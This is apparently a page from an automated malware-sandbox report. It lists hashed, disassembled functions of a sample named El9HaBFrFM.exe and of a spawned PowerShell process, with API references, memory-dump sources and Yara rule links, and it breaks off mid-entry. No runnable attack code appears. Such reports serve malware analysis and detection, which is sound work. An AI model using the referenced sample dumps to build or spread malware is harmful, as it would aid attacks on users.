Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: BINARY$no such collation sequence: %s
API String ID: 2142204133-2451720372
Opcode ID: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
Instruction ID: 72ea4b5d8bc196bbd9e391c20ff4b8a0691c10f72898a26c51fdad5ede3bd345
Opcode Fuzzy Hash: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
Instruction Fuzzy Hash: 5D719D62F1AA8291EF189F218560BB96390EF55BA8F485331DE3D072E9DF3CE195C340

Function 00007FFDFB1299C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

index '%q', xrefs: 00007FFDFB129A12

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: index '%q'
API String ID: 0-1628151297
Opcode ID: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
Instruction ID: d2fbc28e43ac4afc4ec31e68a6921b0e70dc310b9c4263838f252615f9e54599
Opcode Fuzzy Hash: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
Instruction Fuzzy Hash: 66717D77F1965689EB109B69D860EBC3BA0FB48B9CF140635DE2E57BE8DB389441C700

Function 00007FFDFB0C4A30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0C4BCC

Strings

%02d, xrefs: 00007FFDFB0C4B6E, 00007FFDFB0C4BD5

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: %02d
API String ID: 2142204133-896308400
Opcode ID: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
Instruction ID: 66d19db4c94e41739ae7fc9497550fa7134b403c301fcb509d85c895b875a03e
Opcode Fuzzy Hash: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
Instruction Fuzzy Hash: E871AAB6B1969385EB608B68E461ABD7B60FB85748F104031EE9D13AEDDF38E445DB00

Function 00007FFDFAAB1EBF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFAAB9154

Strings

..\s\ssl\d1_srtp.c, xrefs: 00007FFDFAAB908B, 00007FFDFAAB9183
ssl_ctx_make_profiles, xrefs: 00007FFDFAAB907F, 00007FFDFAAB917A

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
API String ID: 4069847057-118859582
Opcode ID: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
Instruction ID: 8a60a4ad368d3185b4f5c48337a9f9331964d2854c4621aeb214c24b35907888
Opcode Fuzzy Hash: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
Instruction Fuzzy Hash: 2C51D425B0C24245FB599765A824BB96390AF45BC4F9840B2DE3D477DEDF3CE8479310

Function 00007FF6BA3C5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BA3C1760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C1793

_get_daylight.LIBCMT ref: 00007FF6BA3C5C34
_get_daylight.LIBCMT ref: 00007FF6BA3C5C45

Strings

?, xrefs: 00007FF6BA3C5BC5

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction ID: ca5cb5ad417d3bb251627e950f2dad7a2e7761b76c1909dad9a2ef81bbb3bdd3
Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction Fuzzy Hash: EA411622A087A246FB648B29E80137A6B61EF80BA4F144275EF5DC7AD6EF3CD4418700

Function 00007FF6BA3B9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B9046

Part of subcall function 00007FF6BA3BA948: HeapFree.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6BA3ACBA5), ref: 00007FF6BA3B9064

Strings

C:\Users\user\Desktop\El9HaBFrFM.exe, xrefs: 00007FF6BA3B9052

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\El9HaBFrFM.exe
API String ID: 3580290477-1581088161
Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction ID: 7e97badaa0ccaea44ec8ca81f79f4ba403a3b2c33def53094e1d1ff2d40dba6a
Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction Fuzzy Hash: E2417E72A08F1686EB14DF29A8900BD67A6EF847D0B9541B5EF4EC3B95DF3CE4818300

Function 00007FFDFB0C9880 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0C999E
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0C99E2

Strings

@, xrefs: 00007FFDFB0C99CC

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: @
API String ID: 2142204133-2766056989
Opcode ID: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
Instruction ID: 8b133f299e82c7afc847d04c793c36d20fed2a0fd48748503ca682fb3f5610b0
Opcode Fuzzy Hash: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
Instruction Fuzzy Hash: 9E416BA1F0F6838AF7168B35A8B09752790AF56790F844239DC6DC63FDDF2CA8849640

Function 00007FF6BA3BCC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6BA3BCD4F
GetLastError.KERNEL32 ref: 00007FF6BA3BCD71

Strings

U, xrefs: 00007FF6BA3BCCFB

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: 8b2636ecf5a37c6a28ec54cecb3cde6a02ebede1cd60dc86711ab11c39cbc8b5
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: C241C232B18B9581DB608F29E8443AA67A5FB98784F844135EF4DC7798EF3CD441CB40

Function 00007FFDFAADDBA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

SSL_SESSION_new, xrefs: 00007FFDFAADDBED, 00007FFDFAADDCA7
..\s\ssl\ssl_sess.c, xrefs: 00007FFDFAADDBCF, 00007FFDFAADDBF9, 00007FFDFAADDCB3, 00007FFDFAADDD03

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
API String ID: 0-402823876
Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
Instruction ID: 242a78352c5aad2ea2f56845450c5479741c0561a32dce5739c104c6c1cb3b64
Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
Instruction Fuzzy Hash: 0831B220B09A8242EB59AB75D865BED23D0BF48748FC841B6DD7C477CADE2CD6458310

Function 00007FFDFAAB80D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FFDFAAB811D
SystemTimeToFileTime.KERNEL32 ref: 00007FFDFAAB812D

Strings

gfff, xrefs: 00007FFDFAAB815F

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction ID: a1cedf13682012cd69de266e0e92eef165f0e82111ba3beb34c03ea84ef170c6
Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction Fuzzy Hash: E621D772B0864685DB58CF29E42077976E4EB8C7C4F4480B6DA5DC77A9DE3CE1458B40

Function 00007FF6BA3BF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6BA3BF5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6BA3BF64A

Strings

:, xrefs: 00007FF6BA3BF60E

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
Instruction ID: fcb5bf7002bc9c5c43ccbfa54844a0bbe3d333a9f6fcb63af7fcece02c784686
Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
Instruction Fuzzy Hash: 5E21F872A08A4181EB649B19D44427D73B2FB84B44F858279DF8DC3694DF7DD548C741

Function 00007FF6BA3AFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6BA3AFD98
RaiseException.KERNEL32 ref: 00007FF6BA3AFDD9

Strings

csm, xrefs: 00007FF6BA3AFDC6

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 580b3386c56f74526aea9c4e6018cf4d7d0a842e23dddda4bd2515111dc8cf6b
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 4B111C32618B9182EB618F19F840259B7E5FB88B88F584270DF8D87768EF3DD555C740

Function 00007FF6BA3C073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C076C
GetDriveTypeW.KERNEL32 ref: 00007FF6BA3C07AC

Strings

:, xrefs: 00007FF6BA3C0795

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 66112ebc79a8769491d7d8a4283cd90d670ab3743ab5ce09253566f55c7b284a
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: C901F22291C76386FB64AF68986127E23A0EF49744F800176DF4CC3681EF3CE440CB08

Function 00007FFDFAAB8B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00007FFDFAAB83B4), ref: 00007FFDFAAB8B36
SystemTimeToFileTime.KERNEL32(?,00007FFDFAAB83B4), ref: 00007FFDFAAB8B46

Strings

gfff, xrefs: 00007FFDFAAB8B7A

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction ID: 31c460e0f67e3d0eef8beca7faceb8466585109c64c2b39be4a1916c6cd67518
Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction Fuzzy Hash: 09012BE2B1854542DB54DB65F8115557790FBCC7C4F449032E69DC7799EE2CD2018700

Analysis Process: powershell.exePID: 7692, Parent PID: 7604COMMON

Executed Functions

Function 00007FFD9A4267F5 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2014004563.00007FFD9A420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f63c017c9953d24752fe73b9f176d5576941d43ad15d7c0ba17771eedae7454
Instruction ID: f182826b5a86f7bd773fe828fd35fc6f1e0061753661c6bee76b1e908590f15e
Opcode Fuzzy Hash: 3f63c017c9953d24752fe73b9f176d5576941d43ad15d7c0ba17771eedae7454
Instruction Fuzzy Hash: 6DD14923A1EAC94FEBA9DBA848755B5BF90EF16314B1801FFD45DCB0D7DA18A805C341

Function 00007FFD9A23E620 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1998500974.00007FFD9A23D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A23D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a23d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ae7d8a2bd9b491e0ba64b15793c28b58e14358f2a523ce2369992dd0e9a9cc
Instruction ID: 5bdd1b9516618e156de9c61f8d9784627dded564a82729951a3bec809d443fa8
Opcode Fuzzy Hash: 16ae7d8a2bd9b491e0ba64b15793c28b58e14358f2a523ce2369992dd0e9a9cc
Instruction Fuzzy Hash: 5041157150DBC48FE75A9B3998559523FF0EF53324B1905DFE088CF1A3DA24A84AC7A2

Function 00007FFD9A359880 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5e15530e02bba3b891627c36859d7c6f40f923ef12485c7ddaf88188931c249
Instruction ID: db5314d6a5755a59aece31d4b1cbc1673693e2a8d7d941d5c04b724b84caef71
Opcode Fuzzy Hash: b5e15530e02bba3b891627c36859d7c6f40f923ef12485c7ddaf88188931c249
Instruction Fuzzy Hash: 2831D231A1CB884FDB1C9B5C98466A9BBE0FB99311F00426FE45DD3292CA70A855CBC2

Function 00007FFD9A35A59C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f9bbaeb3b41cb968decf4eeb75acf2d172c355ad8f93a03f87dd5b435847c0
Instruction ID: 48cb322e9acc7ce9e3fded08824dc607cfdc72af5a3140e7b92c1727ce045925
Opcode Fuzzy Hash: c5f9bbaeb3b41cb968decf4eeb75acf2d172c355ad8f93a03f87dd5b435847c0
Instruction Fuzzy Hash: 2421283190CB8C4FEB59DBAC9C4A7E97FE0EB96321F04416FD448C7152DA74A41ACB92

Function 00007FFD9A353428 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2012055505.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9a350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81fbdc8ecff24231877c89f91e47388293c1632b54fd1116edb9c02ed6a8aae5
Instruction ID: 23b7913df232a9141db2daccf8508c0ef482e7380b33fcee096b2626df1438e8
Opcode Fuzzy Hash: 81fbdc8ecff24231877c89f91e47388293c1632b54fd1116edb9c02ed6a8aae5
Instruction Fuzzy Hash: 5E218162A0E3D14FE7175BAC98B20E53FB0DF4322470E11EBD4C98B4A7D91A684AC795

Function 00007FFD9A3533B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

